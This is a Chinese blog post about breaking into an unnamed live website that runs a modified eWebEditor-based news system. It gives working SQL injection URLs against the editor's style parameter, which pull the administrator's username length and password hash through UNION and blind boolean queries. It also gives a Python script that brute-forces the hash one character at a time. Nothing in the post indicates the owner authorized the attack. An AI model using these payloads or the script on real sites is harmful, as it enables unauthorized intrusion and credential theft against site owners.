某网站(JSP + Access) 渗透 实例 ( eWebEditor 漏洞 )

2018年04月15日 07:03:50 阅读数:186 标签: 渗透
个人分类: 渗透
版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/Knove/article/details/79946318

某网站后台是用的   蓝滨新闻系统精简加强版 即如图:


可见,后台是JSP + Access,虽然这个新闻系统标题写了是安全性加强版本,但是对于这种系统我还是很感兴趣的。

根据这个系统的源代码,找这个系统的漏洞。

manage/htmledit/eWebEditor.asp

	sSql = "select * from ewebeditor_style where s_name='" & sStyleName & "'"
	oRs.Open sSql, oConn, 0,

可以看到,这里有注入。这里用的是臭名昭著的 eWebEditor 2.8.0 最终版

如果是纯粹的eWebEditor ,那么到这里 直接上工具就行了。但是这里是魔改过的,所以,传统的注入不可以。所以需要魔改SQL语句。因为数据库是Access,破解就好麻烦啦。。

http://xxxx/news/manage/htmledit/eWebEditor.asp?id=14&style=standard%27%20union%20select%20sys_UserPass,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20eWebEditor_System''

http://xxxx/news/manage/htmledit/eWebEditor.asp?id=14&style=standard' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from eWebEditor_System

http://xxxx/news/manage/htmledit/eWebEditor.asp?id=14&style=standard' and ((select top 1 asc(mid(sys_UserPass,1,1)) from eWebEditor_System)>97)  union select (14),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from eWebEditor_System

http://xxxx/news/manage/htmledit/eWebEditor.asp?id=14&style=standard' union 
select * from eWebEditor_System where ((select top 1 asc(mid(sys_UserPass,1,1)) from eWebEditor_System)>97)



## 猜解出密码和用户名长度:16 根据程序可见,是纯MD5加密
http://xxxx/news/manage/htmledit/eWebEditor.asp?id=14&style=standard' union select (select (14) from eWebEditor_System where ((select top 1 len(sys_UserName) from eWebEditor_System) = 16)),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from eWebEditor_System
true ;

## 成功实现ASC II 表的字符匹配 ,如果报错则是不匹配
http://xxxx/news/manage/htmledit/eWebEditor.asp?id=14&style=standard' union select (select (14) from eWebEditor_System where ((select top 1 asc(sys_UserPass,1,1)) from eWebEditor_System)<97)),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from eWebEditor_System
http://xxxx/news/manage/htmledit/eWebEditor.asp?id=14&style=standard%27%20union%20select%20(select%20(14)%20from%20eWebEditor_System%20where%20((select%20top%201%20asc(mid(sys_UserPass,1,1))%20from%20eWebEditor_System)<66)),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20eWebEditor_System

http://xxxx/news/manage/htmledit/eWebEditor.asp?" \
              "id=14&style=standard%27%20union%20select%20(select%20(14)%20from%20eWebEditor_System%20where%20((select%20top%201%20asc(mid(sys_UserName,"+str(charNum) +",1))%20from%20eWebEditor_System)<" + str(
            n) + ")),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20eWebEditor_System

到这里,就成功可以解出系统的用户名以及密码了。但是这里是用的ASC II 表匹配。一个一个试不现实。

写个针对性Python进行注入穷举:

kn.py

#encoding:UTF-8
import requests
##定义 n:找ASCII码
n = 48
charNum = 1
allAscII = ""
while charNum<=16:
    while 1:
        url = "http://xxxxxxx/news/news/manage/htmledit/eWebEditor.asp?" \
              "id=14&style=standard%27%20union%20select%20(select%20(14)%20from%20eWebEditor_System%20where%20((select%20top%201%20asc(mid(sys_UserPass,"+str(charNum) +",1))%20from%20eWebEditor_System)=" + str(
            n) + ")),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20eWebEditor_System"
        r = requests.get(url)
        print("访问成功,正在访问第"+ str(charNum)+"个位置的码,尝试的ASC II 码为:" + str(n) + "获取到的长度为" + str(len(r.text)))
        if len(r.text) > 400:
            print("成功获取到第"+ str(charNum)+"个位置 的 ASC II 码!为" + str(n))
            allAscII = allAscII + str(n) + ","
            break;
        n = n + 1
    charNum = charNum + 1
    n = 48
print(allAscII)
## 失败 长度少于400 (=317)
## 成功 长度大于400  (=12370)
## print(len(r.text))

运行:



获取了十六位的ASC II 码后,就可以根据这个表


进行转换,然后得到密码md5值


阅读更多
想对作者说点什么?

【渗透实战】拿下一个智能交易网站经验分享

02-23 484

以后这类文章都会打码,只是单纯做技术分享!在群里,有人在直播R站,有站那就一起搞嘛~存在注入存在过滤发现可以大小写绕过然后,顺手就是启动sqlmap --tamper space2comment.py... 来自: DYBOY-小东-安全菜鸟-WEB狗-狗年不苟

不登陆后台也可以拿到shell,ewebeditor漏洞要小心

02-13 9855

在数据库没被删掉的情况下。(默认:/db/ewebeditor.mdb)如果没删掉的话,把数据库给Down下来。然后打开,查看Style这里,看看“前人”有没有留下痕迹 看看表格内有没有上传过asp ... 来自: lbuskeep的专栏

如何入侵jsp网站

01-26 2505

在用JSP制作的电子商务网站多如牛毛。但是对于JSP网站而言,安全性真的能够让人放心吗?面对层出不穷的黑客攻击和病毒袭击,JSP网站的服务器能够比其他网站的服务器器更加安全吗?前段时间,应朋友之邀,我... 来自: 理央silence

ewebeditor漏洞大全

03-23 3279

1:默认管理后台: http://www.backlion.com/ewebeditor/admin_login.asp 后台如果能进入: 可点击样式管理: standard 拷贝一... 来自: xysoul的专栏

尝试JSP各种已知漏洞

06-15 3631

前段时间,应朋友之邀,我对他们托管的三台服务器的主机进行了测试,发现了JSP网站存在的几个问题。   入侵测试第一步:扫描   扫描是入侵的第一步,它可以让你对即将入侵的目标有一个全面的了解。同时... 来自: u012402926的专栏

JSP漏洞大观

05-10 407

综述:服务器漏洞是安全问题的起源,黑客对网站的攻击也大多是从查找对方的漏洞开始的。所以只有了解自身的漏洞,网站管理人员才能采取相应的对策,阻止外来的攻击。下面介绍一下一些服务器(包括Web服务器和JS... 来自: zaowei21的专栏

JSP系统漏洞记录

08-13 1804

之前维护公司的一个很老的CRM系统,大概是十年前开发的一套系统,由于系统中的功能设计到的业务很重要,所以客户一直在使用,但是老系统又避免不了安全问题,为了防止系统资料泄露,客户对CRM系统进行了一次安... 来自: samile的专栏

入侵基于JSP+Tomcat的Web网站实录

11-04 968

 很偶然的一个机会,浏览到一个网站,页面清新让人感觉很舒服。网站是用JSP开发的,出于个人爱好,我决定测试一下其系统的安全性。 telnet www.target.com 8080GET /CHINA... 来自: 上班搞IT,下班搞ITF。

针对单个网站的渗透思路(精)

06-13 690

本人Web安全初学者,从老师那里获得了一套很完整的针对单一网站的渗透思路今天起的早,就自己试着总结一份,记下来。分享给大家。首先,当我们拿到一个网站的域名或者IP的时候。最先要做的是信息收集。下面着重... 来自: 18年3月萌新白帽子

网站入侵思路(初级黑客渗透篇)

09-11 4.1万

网站入侵思路(初级黑客渗透篇)           作者:80  1,〓经典注入〓      通常,判断一个网站是否存在注入点,可以用’,and 1=1 ,and 1=2,+and+1=1,+and... 来自: lizhengnanhua的专栏

相关热词
c网站网站 网站入侵网站 存储网站原理网站 网站里面嵌套网站 网站爬虫不同网站

博主推荐

换一批

没有更多推荐了,返回首页
注册